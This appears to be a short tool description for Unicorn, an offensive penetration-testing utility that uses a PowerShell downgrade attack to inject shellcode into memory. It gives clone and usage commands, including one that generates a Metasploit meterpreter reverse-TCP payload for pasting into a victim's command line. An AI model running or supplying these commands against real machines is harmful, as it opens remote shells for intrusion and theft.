PowerShell downgrade attack


Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber’s PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

Usage is simple, just run Magic Unicorn (ensure Metasploit is installed and in the right path) and magic unicorn will automatically generate a PowerShell command that you need to simply cut and paste the PowerShell code into a command line window or through a payload delivery system.


git clone https://github.com/trustedsec/unicorn.git
python unicorn.py


python unicorn.py payload reverse_ipaddr port
python unicorn.py windows/meterpreter/reverse_tcp 1337